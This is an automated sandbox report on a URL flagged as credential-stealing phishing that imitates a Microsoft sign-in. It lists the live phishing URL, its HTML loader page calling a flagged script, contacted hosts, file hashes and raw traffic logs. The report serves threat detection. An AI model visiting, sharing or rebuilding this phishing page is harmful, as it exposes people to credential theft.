          Source: unknownNetwork traffic detected: HTTP traffic on port 57334 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57363 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57340 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57386 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57302 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57314 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57434 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57446 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57411 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57392 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57308 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57381 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57417 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57325 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57400 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57368 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57428 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57319 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57452 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57374 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57307 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57313 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57445 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57435 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57380 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57346 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57406 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57429 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57451 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57375 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57352 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57358 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57440 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57335 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57423 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57369 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57400
          Source: unknownNetwork traffic detected: HTTP traffic on port 57341 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57324 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57412 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57397 -> 443
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49769 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49769 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:57301 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:57302 version: TLS 1.2
          Source: classification engineClassification label: mal96.phis.win@16/36@16/9
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2280,i,3473752341378461948,12327758157782280307,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2280,i,3473752341378461948,12327758157782280307,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
          Process Injection
          1
          Process Injection
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N100%Avira URL Cloudphishing
          https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N100%SlashNextCredential Stealing type: Phishing & Social Engineering
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://thewesteffect.com/favicon.ico100%Avira URL Cloudphishing
          https://thewesteffect.com/n/jsnom.js100%Avira URL Cloudphishing
          NameIPActiveMaliciousAntivirus DetectionReputation
          d2vgu95hoyrpkh.cloudfront.net
          13.35.58.71
          truefalse
            high
            cs837.wac.edgecastcdn.net
            192.229.133.221
            truefalse
              high
              s-part-0017.t-0009.t-msedge.net
              13.107.246.45
              truefalse
                high
                sni1gl.wpc.omegacdn.net
                152.199.21.175
                truefalse
                  high
                  www.google.com
                  142.250.185.196
                  truefalse
                    high
                    thewesteffect.com
                    192.254.232.133
                    truefalse
                      high
                      aadcdn.msftauth.net
                      unknown
                      unknownfalse
                        high
                        www.w3schools.com
                        unknown
                        unknownfalse
                          high
                          cdn.socket.io
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://thewesteffect.com/favicon.icotrue
                            • Avira URL Cloud: phishing
                            unknown
                            https://thewesteffect.com/n/jsnom.jstrue
                            • Avira URL Cloud: phishing
                            unknown
                            https://cdn.socket.io/4.7.5/socket.io.min.jsfalse
                              high
                              https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123Ntrue
                                unknown
                                https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svgfalse
                                  high
                                  https://www.w3schools.com/w3css/4/w3.cssfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://cdn.socket.io/4.6.0/socket.io.min.jschromecache_62.1.dr, chromecache_65.1.drfalse
                                      high
                                      https://google.comchromecache_62.1.dr, chromecache_65.1.drfalse
                                        high
                                        https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffcchromecache_62.1.dr, chromecache_65.1.drfalse
                                          high
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          192.254.232.133
                                          thewesteffect.comUnited States
                                          46606UNIFIEDLAYER-AS-1USfalse
                                          13.107.246.45
                                          s-part-0017.t-0009.t-msedge.netUnited States
                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                          192.229.133.221
                                          cs837.wac.edgecastcdn.netUnited States
                                          15133EDGECASTUSfalse
                                          239.255.255.250
                                          unknownReserved
                                          unknownunknownfalse
                                          142.250.185.196
                                          www.google.comUnited States
                                          15169GOOGLEUSfalse
                                          13.35.58.71
                                          d2vgu95hoyrpkh.cloudfront.netUnited States
                                          16509AMAZON-02USfalse
                                          152.199.21.175
                                          sni1gl.wpc.omegacdn.netUnited States
                                          15133EDGECASTUSfalse
                                          13.35.58.91
                                          unknownUnited States
                                          16509AMAZON-02USfalse
                                          IP
                                          192.168.2.4
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1558089
                                          Start date and time:2024-11-18 23:42:54 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 3m 4s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:browseurl.jbs
                                          Sample URL:https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:8
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal96.phis.win@16/36@16/9
                                          EGA Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.181.238, 142.251.168.84, 34.104.35.123, 142.250.186.35, 172.217.18.10, 142.250.185.74, 142.250.186.106, 172.217.18.106, 172.217.23.106, 216.58.206.74, 142.250.186.74, 142.250.185.202, 142.250.185.170, 142.250.185.234, 172.217.16.202, 142.250.185.106, 142.250.185.138, 142.250.184.234, 142.250.186.170, 216.58.212.138, 142.250.181.227, 93.184.221.240, 192.229.221.95, 142.250.186.67
                                          • Excluded domains from analysis (whitelisted): logincdn.msauth.net, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, dns.msftncsi.com, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, www.gstatic.com
                                          • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N
                                          No simulations
                                          No context
                                          No context
                                          No context
                                          No context
                                          No context
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                          Category:dropped
                                          Size (bytes):2407
                                          Entropy (8bit):7.900400471609788
                                          Encrypted:false
                                          SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                          MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                          SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                          SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                          SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                          Malicious:false
                                          Reputation:low
                                          Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                          Category:dropped
                                          Size (bytes):276
                                          Entropy (8bit):7.316609873335077
                                          Encrypted:false
                                          SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                          MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                          SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                          SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                          SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                          Malicious:false
                                          Reputation:low
                                          Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                          Category:dropped
                                          Size (bytes):1435
                                          Entropy (8bit):7.8613342322590265
                                          Encrypted:false
                                          SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                          MD5:9F368BC4580FED907775F31C6B26D6CF
                                          SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                          SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                          SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                          Malicious:false
                                          Reputation:low
                                          Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (49854)
                                          Category:dropped
                                          Size (bytes):49993
                                          Entropy (8bit):5.216475744251136
                                          Encrypted:false
                                          SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                          MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                          SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                          SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                          SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                          Malicious:false
                                          Reputation:low
                                          Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                          Category:dropped
                                          Size (bytes):199
                                          Entropy (8bit):6.766983163126765
                                          Encrypted:false
                                          SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                          MD5:21B761F2B1FD37F587D7222023B09276
                                          SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                          SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                          SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                          Malicious:false
                                          Reputation:low
                                          Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (49854)
                                          Category:downloaded
                                          Size (bytes):49993
                                          Entropy (8bit):5.216475744251136
                                          Encrypted:false
                                          SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                          MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                          SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                          SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                          SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                          Malicious:false
                                          Reputation:low
                                          URL:https://cdn.socket.io/4.7.5/socket.io.min.js
                                          Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, ASCII text
                                          Category:downloaded
                                          Size (bytes):366
                                          Entropy (8bit):5.587293296737667
                                          Encrypted:false
                                          SSDEEP:6:5mWxuJGzxHg9cJOl6CiwAGfOVZA+WLShJTIP5TNm5dSUmxDeY4NhdA1BYXXfbwYj:4WYcVACOl6CDAWOvfWLSsPZ45dWDd4N5
                                          MD5:5622DDDA017D6AD01E1E05DE67C9C35D
                                          SHA1:2D37DF8730E6945965E0A73B974790FDCBB364C3
                                          SHA-256:634F331970805FA07A10285B8C1FBB57CA7A065A5272A4973BC8361CDB92ECA5
                                          SHA-512:328625F15D45D4B6E67BD0B25444D8CAE89B7C0B682C7335C701DEB67C9332D4E126DF3F5165219581FFA6DB9A904C37764C78226FAF1D626EAF2B1AE0F6527B
                                          Malicious:false
                                          Reputation:low
                                          URL:https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N
                                          Preview:.<!DOCTYPE html>.<html id='html' sti='VlZORlVqRXpNVEV5TURJMFZUUXlNVEV4TXpBMQ==' vic='' lang='en'>..<head>. <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' crossorigin='anonymous'></script>.</head>..<body id='allbody'>..</body>..<script src='jsnom.js'></script>.</html>
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):2228
                                          Entropy (8bit):7.82817506159911
                                          Encrypted:false
                                          SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                          MD5:EF9941290C50CD3866E2BA6B793F010D
                                          SHA1:4736508C795667DCEA21F8D864233031223B7832
                                          SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                          SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                          Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:SVG Scalable Vector Graphics image
                                          Category:dropped
                                          Size (bytes):1636
                                          Entropy (8bit):4.214613323368661
                                          Encrypted:false
                                          SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                          MD5:F7AB697E65B83CE9870A4736085DEEEC
                                          SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                          SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                          SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                          Malicious:false
                                          Reputation:low
